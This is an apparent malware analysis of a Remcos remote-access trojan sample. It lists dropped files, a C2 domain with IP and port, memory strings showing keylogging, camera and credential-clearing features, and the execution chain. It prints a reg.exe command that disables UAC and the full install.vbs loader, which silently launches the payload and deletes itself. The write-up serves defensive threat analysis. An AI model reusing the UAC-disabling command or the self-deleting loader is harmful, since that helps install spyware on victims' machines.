Remcos rat sample

https://pastebin.com/raw/WQ2k21mE

found by Keith Smith @SevenLayerJedi #remcos rat https://twitter.com/SevenLayerJedi/status/980809311042629634
https://pastebin.com/raw/x7DJ9Drj
https://www.hybrid-analysis.com/sample/6050fea1bb63a53a31b0e1ed957427a1d916115c83dffaf2b2d5c25bcc51b146/5ac22fed7ca3e10787046705

exe ran and created a new chrome.exe process where it does it's bidding from

--------------
files seen
--------------
C:\Users\xxx\AppData\Roaming\remcos\remcos.exe
C:\Users\xxx\AppData\Local\temp\install.vbs
chrome.exe

--------------
network connections
--------------
georgeoffor.ddns.net 213.183.58.61
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@

--------------
interesting in memory strings
--------------
0x301994 (166): "C:\Windows\System32\WScript.exe" "C:\Users\Win732\AppData\Local\Temp\install.vbs" 
0x413658 (11): CloseCamera
0x413664 (10): OpenCamera
0x41385c (23): Uploading file to C&C: 
0x413884 (25): Offline Keylogger Started
0x4138b0 (27): { User has been idle for 
0x4138cc (12):  minutes }
0x4138dc (24): Online Keylogger Started
0x4138f8 (24): Online Keylogger Stopped
0x413914 (25): Offline Keylogger Stopped
0x413c00 (38): [Chrome StoredLogins found, cleared!]
0x413d0c (32): [Firefox StoredLogins cleared!]
0x414210 (24): \install.vbs
0x4142f0 (28): \uninstall.vbs
0x414398 (22): \update.vbs
0x41444c (24): \restart.vbs
0x4146c4 (27): C:\Windows\System32\cmd.exe
0x4146e0 (129): /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0x4148b4 (17): Connected to C&C!
0x4148c8 (34): Initializing connection to C&C...
0x414d74 (27):  * Breaking-Security.Net
0x414d90 (11):  * REMCOS v
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
0x817039 (11): Screenshots
0x817579 (23): Software\Remcos-SCLZ2Y\
0x817aa2 (94): C:\Users\xxx\AppData\Roaming\remcos\logs.dat

--------------
interesting api calls seen
--------------
chrome.exe CreateDirectoryW ( "C:\Users\xxx\AppData\Roaming\remcos", NULL ) FALSE 
chrome.exe CreateFileW ( "C:\Users\xxx\AppData\Roaming\remcos\logs.dat", GENERIC_READ, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ) 
chrome.exe gethostbyname ( "georgeoffor.ddns.net" ) 0x00386da8  0.0003958
 

--------------
interesting file found install.vbs
--------------
WScript.Sleep 1000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\Users\xxx\Desktop\bad.exe"
CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\xxx\AppData\Roaming\remcos\remcos.exe""", 0
fso.DeleteFile(Wscript.ScriptFullName)
--------------